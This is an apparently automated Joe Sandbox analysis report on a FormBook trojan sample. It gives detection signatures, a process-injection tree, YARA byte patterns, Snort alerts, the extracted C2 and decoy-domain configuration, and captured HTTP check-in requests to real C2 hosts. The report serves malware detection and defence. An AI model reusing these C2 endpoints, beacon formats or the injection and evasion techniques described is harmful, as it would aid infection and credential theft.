Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report lTAPQJikGw

Overview

General Information

Sample Name:lTAPQJikGw (renamed file extension from none to exe)
Analysis ID:432746
MD5:16657fa097cd334973a5489eeff8bafe
SHA1:b6db5e9cc112155b7285f0a415cf4889ff1bf7ef
SHA256:2589143d02f6aef252b5b704f6b98723ae131d3279bcf36d57ee26318bc0741f
Tags:exetrojan
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • lTAPQJikGw.exe (PID: 7056 cmdline: 'C:\Users\user\Desktop\lTAPQJikGw.exe' MD5: 16657FA097CD334973A5489EEFF8BAFE)
    • lTAPQJikGw.exe (PID: 6192 cmdline: C:\Users\user\Desktop\lTAPQJikGw.exe MD5: 16657FA097CD334973A5489EEFF8BAFE)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • control.exe (PID: 6848 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
        • cmd.exe (PID: 6952 cmdline: /c del 'C:\Users\user\Desktop\lTAPQJikGw.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 6936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.adultpeace.com/p2io/"], "decoy": ["essentiallyourscandles.com", "cleanxcare.com", "bigplatesmallwallet.com", "iotcloud.technology", "dmgt4m2g8y2uh.net", "malcorinmobiliaria.com", "thriveglucose.com", "fuhaitongxin.com", "magetu.info", "pyithuhluttaw.net", "myfavbutik.com", "xzklrhy.com", "anewdistraction.com", "mercuryaid.net", "thesoulrevitalist.com", "swayam-moj.com", "liminaltechnology.com", "lucytime.com", "alfenas.info", "carmelodesign.com", "newmopeds.com", "cyrilgraze.com", "ruhexuangou.com", "trendbold.com", "centergolosinas.com", "leonardocarrillo.com", "advancedaccessapplications.com", "aideliveryrobot.com", "defenestration.world", "zgcbw.net", "shopihy.com", "3cheer.com", "untylservice.com", "totally-seo.com", "cmannouncements.com", "tpcgzwlpyggm.mobi", "hfjxhs.com", "balloon-artists.com", "vectoroutlines.com", "boogerstv.com", "procircleacademy.com", "tricqr.com", "hazard-protection.com", "buylocalclub.info", "m678.xyz", "hiddenwholesale.com", "ololmychartlogin.com", "redudiban.com", "brunoecatarina.com", "69-1hn7uc.net", "zmzcrossrt.xyz", "dreamcashbuyers.com", "yunlimall.com", "jonathan-mandt.com", "painhut.com", "pandemisorgugirisi-tr.com", "sonderbach.net", "kce0728com.net", "austinpavingcompany.com", "biztekno.com", "rodriggi.com", "micheldrake.com", "foxwaybrasil.com", "a3i7ufz4pt3.net"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.730022102.0000000001810000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000002.730022102.0000000001810000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.730022102.0000000001810000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 21 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.0.lTAPQJikGw.exe.400000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.0.lTAPQJikGw.exe.400000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.0.lTAPQJikGw.exe.400000.1.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166a9:$sqlite3step: 68 34 1C 7B E1
        • 0x167bc:$sqlite3step: 68 34 1C 7B E1
        • 0x166d8:$sqlite3text: 68 38 2A 90 C5
        • 0x167fd:$sqlite3text: 68 38 2A 90 C5
        • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
        2.0.lTAPQJikGw.exe.400000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.0.lTAPQJikGw.exe.400000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 10 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://www.cmannouncements.com/p2io/?CFQHg=wzEdtbrCY4VKdG4P/h093gtD2EzP1yO8zPZJPXBkhd23ZEiSfiVlmlbiUjAoERCVF5eV&Pr980v=G2MtWNVHSAvira URL Cloud: Label: malware
          Source: http://www.balloon-artists.com/p2io/?CFQHg=/DMwn9vTy70wY8Gt9syYwdBt6sFcRXVvValBDdDX8KtazsYeLKsYeQz2+d78EfQIVSnp&Pr980v=G2MtWNVHSAvira URL Cloud: Label: malware
          Source: http://www.boogerstv.com/p2io/?CFQHg=fW2NkW2j278wyrs6d/m+egXTc5dWq8qtohQAL+tQrXSmfdetyJ3HBVVg7gxxicKRFJwM&Pr980v=G2MtWNVHSAvira URL Cloud: Label: malware
          Source: http://www.dreamcashbuyers.com/p2io/?CFQHg=H0m9fF/5FM7UqIICC4653EpAABAppk+gPAvqYefbAICNl1a1FFJvvx6E9HTJL6Hcfv3l&Pr980v=G2MtWNVHSAvira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 00000000.00000002.658248909.0000000004349000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.adultpeace.com/p2io/"], "decoy": ["essentiallyourscandles.com", "cleanxcare.com", "bigplatesmallwallet.com", "iotcloud.technology", "dmgt4m2g8y2uh.net", "malcorinmobiliaria.com", "thriveglucose.com", "fuhaitongxin.com", "magetu.info", "pyithuhluttaw.net", "myfavbutik.com", "xzklrhy.com", "anewdistraction.com", "mercuryaid.net", "thesoulrevitalist.com", "swayam-moj.com", "liminaltechnology.com", "lucytime.com", "alfenas.info", "carmelodesign.com", "newmopeds.com", "cyrilgraze.com", "ruhexuangou.com", "trendbold.com", "centergolosinas.com", "leonardocarrillo.com", "advancedaccessapplications.com", "aideliveryrobot.com", "defenestration.world", "zgcbw.net", "shopihy.com", "3cheer.com", "untylservice.com", "totally-seo.com", "cmannouncements.com", "tpcgzwlpyggm.mobi", "hfjxhs.com", "balloon-artists.com", "vectoroutlines.com", "boogerstv.com", "procircleacademy.com", "tricqr.com", "hazard-protection.com", "buylocalclub.info", "m678.xyz", "hiddenwholesale.com", "ololmychartlogin.com", "redudiban.com", "brunoecatarina.com", "69-1hn7uc.net", "zmzcrossrt.xyz", "dreamcashbuyers.com", "yunlimall.com", "jonathan-mandt.com", "painhut.com", "pandemisorgugirisi-tr.com", "sonderbach.net", "kce0728com.net", "austinpavingcompany.com", "biztekno.com", "rodriggi.com", "micheldrake.com", "foxwaybrasil.com", "a3i7ufz4pt3.net"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: lTAPQJikGw.exeVirustotal: Detection: 44%Perma Link
          Source: lTAPQJikGw.exeReversingLabs: Detection: 43%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.730022102.0000000001810000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.658248909.0000000004349000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.916418172.0000000000DA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.656408527.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.916447629.0000000000DD0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.729969001.00000000017E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.0.lTAPQJikGw.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.lTAPQJikGw.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.lTAPQJikGw.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.lTAPQJikGw.exe.4349930.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.lTAPQJikGw.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: lTAPQJikGw.exeJoe Sandbox ML: detected
          Source: 2.0.lTAPQJikGw.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.2.lTAPQJikGw.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: lTAPQJikGw.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: lTAPQJikGw.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.697776172.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\xxwqcHkmba\src\obj\Debug\CryptoConfig.pdb source: lTAPQJikGw.exe
          Source: Binary string: control.pdb source: lTAPQJikGw.exe, 00000002.00000002.730162331.0000000001970000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: lTAPQJikGw.exe, 00000002.00000002.729531949.00000000015CF000.00000040.00000001.sdmp, control.exe, 00000007.00000002.917101037.0000000004B60000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: lTAPQJikGw.exe, control.exe
          Source: Binary string: control.pdbUGP source: lTAPQJikGw.exe, 00000002.00000002.730162331.0000000001970000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.697776172.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_01870448
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_01870751
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_01870760
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 4x nop then pop edi2_2_00416282
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 4x nop then pop ebx2_2_00406A94
          Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then pop ebx7_2_00936A95
          Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then pop edi7_2_00946282

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 74.220.199.8:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 74.220.199.8:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 74.220.199.8:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49768 -> 199.195.117.147:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49768 -> 199.195.117.147:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49768 -> 199.195.117.147:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49776 -> 104.21.15.16:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49776 -> 104.21.15.16:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49776 -> 104.21.15.16:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.adultpeace.com/p2io/
          Source: global trafficHTTP traffic detected: GET /p2io/?CFQHg=/DMwn9vTy70wY8Gt9syYwdBt6sFcRXVvValBDdDX8KtazsYeLKsYeQz2+d78EfQIVSnp&Pr980v=G2MtWNVHS HTTP/1.1Host: www.balloon-artists.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?CFQHg=4oufm6g5t6Bqg3y0mDBWoA8I6Q2bNaX51tGc9mj7mZf0wZ/j7IpC3Y+it5NkyKMHKzCR&Pr980v=G2MtWNVHS HTTP/1.1Host: www.adultpeace.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?CFQHg=wzEdtbrCY4VKdG4P/h093gtD2EzP1yO8zPZJPXBkhd23ZEiSfiVlmlbiUjAoERCVF5eV&Pr980v=G2MtWNVHS HTTP/1.1Host: www.cmannouncements.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?CFQHg=wzEdtbrCY4VKdG4P/h093gtD2EzP1yO8zPZJPXBkhd23ZEiSfiVlmlbiUjAoERCVF5eV&Pr980v=G2MtWNVHS HTTP/1.1Host: www.cmannouncements.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?CFQHg=Z8FkwwkqwMcbR63JqM/eMJCTIQtJD+6S4GLVkEvBdcKRRdmUAPmyd56itTHHstyDZ3vx&Pr980v=G2MtWNVHS HTTP/1.1Host: www.leonardocarrillo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?CFQHg=H0m9fF/5FM7UqIICC4653EpAABAppk+gPAvqYefbAICNl1a1FFJvvx6E9HTJL6Hcfv3l&Pr980v=G2MtWNVHS HTTP/1.1Host: www.dreamcashbuyers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?CFQHg=0YkKA47wwnQsSd2I7kPMKR9IRaKfA7HvmAjNs5nkCsbL4/Nj4Thso/t2FfIp2mnBj9Pa&Pr980v=G2MtWNVHS HTTP/1.1Host: www.swayam-moj.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?CFQHg=DTtQlm+bkwamRHt6VrobrkMYYvpq+NlfspH3ROyN3o99G08d4+CoiJMc5PUrO1w4I+TP&Pr980v=G2MtWNVHS HTTP/1.1Host: www.hfjxhs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?CFQHg=lrOqxb+RJFhwpubsYZ1tkMjkgx31NOkXgmE0j6vPa760pj23uu3lC+ndsaG2+azAf30S&Pr980v=G2MtWNVHS HTTP/1.1Host: www.defenestration.worldConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?CFQHg=fW2NkW2j278wyrs6d/m+egXTc5dWq8qtohQAL+tQrXSmfdetyJ3HBVVg7gxxicKRFJwM&Pr980v=G2MtWNVHS HTTP/1.1Host: www.boogerstv.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?CFQHg=TySV6YYzJGXnavbEwOCoDLKT5SC+Z4HfI/S6WoKTLKp4rrhaLWxPw3pQ7MooJpxvMOcw&Pr980v=G2MtWNVHS HTTP/1.1Host: www.totally-seo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?CFQHg=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf04YLJeQ+Gz7y&Pr980v=G2MtWNVHS HTTP/1.1Host: www.cleanxcare.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 147.255.162.204 147.255.162.204
          Source: Joe Sandbox ViewIP Address: 198.185.159.144 198.185.159.144
          Source: Joe Sandbox ViewASN Name: LEASEWEB-USA-SFO-12US LEASEWEB-USA-SFO-12US
          Source: global trafficHTTP traffic detected: GET /p2io/?CFQHg=/DMwn9vTy70wY8Gt9syYwdBt6sFcRXVvValBDdDX8KtazsYeLKsYeQz2+d78EfQIVSnp&Pr980v=G2MtWNVHS HTTP/1.1Host: www.balloon-artists.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?CFQHg=4oufm6g5t6Bqg3y0mDBWoA8I6Q2bNaX51tGc9mj7mZf0wZ/j7IpC3Y+it5NkyKMHKzCR&Pr980v=G2MtWNVHS HTTP/1.1Host: www.adultpeace.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?CFQHg=wzEdtbrCY4VKdG4P/h093gtD2EzP1yO8zPZJPXBkhd23ZEiSfiVlmlbiUjAoERCVF5eV&Pr980v=G2MtWNVHS HTTP/1.1Host: www.cmannouncements.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?CFQHg=wzEdtbrCY4VKdG4P/h093gtD2EzP1yO8zPZJPXBkhd23ZEiSfiVlmlbiUjAoERCVF5eV&Pr980v=G2MtWNVHS HTTP/1.1Host: www.cmannouncements.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?CFQHg=Z8FkwwkqwMcbR63JqM/eMJCTIQtJD+6S4GLVkEvBdcKRRdmUAPmyd56itTHHstyDZ3vx&Pr980v=G2MtWNVHS HTTP/1.1Host: www.leonardocarrillo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?CFQHg=H0m9fF/5FM7UqIICC4653EpAABAppk+gPAvqYefbAICNl1a1FFJvvx6E9HTJL6Hcfv3l&Pr980v=G2MtWNVHS HTTP/1.1Host: www.dreamcashbuyers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?CFQHg=0YkKA47wwnQsSd2I7kPMKR9IRaKfA7HvmAjNs5nkCsbL4/Nj4Thso/t2FfIp2mnBj9Pa&Pr980v=G2MtWNVHS HTTP/1.1Host: www.swayam-moj.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?CFQHg=DTtQlm+bkwamRHt6VrobrkMYYvpq+NlfspH3ROyN3o99G08d4+CoiJMc5PUrO1w4I+TP&Pr980v=G2MtWNVHS HTTP/1.1Host: www.hfjxhs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?CFQHg=lrOqxb+RJFhwpubsYZ1tkMjkgx31NOkXgmE0j6vPa760pj23uu3lC+ndsaG2+azAf30S&Pr980v=G2MtWNVHS HTTP/1.1Host: www.defenestration.worldConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?CFQHg=fW2NkW2j278wyrs6d/m+egXTc5dWq8qtohQAL+tQrXSmfdetyJ3HBVVg7gxxicKRFJwM&Pr980v=G2MtWNVHS HTTP/1.1Host: www.boogerstv.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?CFQHg=TySV6YYzJGXnavbEwOCoDLKT5SC+Z4HfI/S6WoKTLKp4rrhaLWxPw3pQ7MooJpxvMOcw&Pr980v=G2MtWNVHS HTTP/1.1Host: www.totally-seo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?CFQHg=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf04YLJeQ+Gz7y&Pr980v=G2MtWNVHS HTTP/1.1Host: www.cleanxcare.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.balloon-artists.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Jun 2021 16:08:23 GMTServer: Apache/2.4.48 (cPanel) OpenSSL/1.1.1k mod_bwlimited/1.4Content-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: lTAPQJikGw.exe, 00000000.00000002.657793972.0000000003341000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000003.00000000.688234599.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
